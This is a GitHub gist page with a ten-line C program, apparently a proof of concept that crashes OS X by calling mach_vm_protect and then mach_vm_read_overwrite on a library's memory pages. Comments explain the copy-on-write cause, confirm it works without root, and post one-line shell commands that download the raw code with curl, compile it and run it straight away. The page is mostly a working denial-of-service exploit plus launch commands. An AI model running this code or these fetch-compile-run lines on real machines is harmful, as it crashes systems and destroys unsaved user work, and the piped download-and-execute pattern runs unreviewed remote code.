Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Kernel panic in latest OS X in 10 lines of C
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>
int
main (int argc, char * argv[])
{
volatile char * library;
const mach_vm_size_t page_size = getpagesize ();
const mach_vm_size_t buffer_size = 3 * page_size;
char buffer[buffer_size];
mach_vm_size_t result_size;
library = (char *) _dyld_get_image_header (1);
mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
library[page_size]++;
library[page_size]--;
result_size = 0;
mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);
return 0;
}

sbose78 commented Feb 20, 2015

Some code comments would help :(

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writings on that offset and then tries to read the first 3 pages of the image into a buffer.

oleavr commented Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

kainz commented Feb 21, 2015

Does this require root to run?

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash

Bilge commented Feb 21, 2015

library[page_size]++;
library[page_size]--; 

Am I being trolled?

bcho commented Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr 's comment.

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out

iskl commented Apr 5, 2015

The code do works!!! Awesome!!! Fantastic!!! Unreal!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment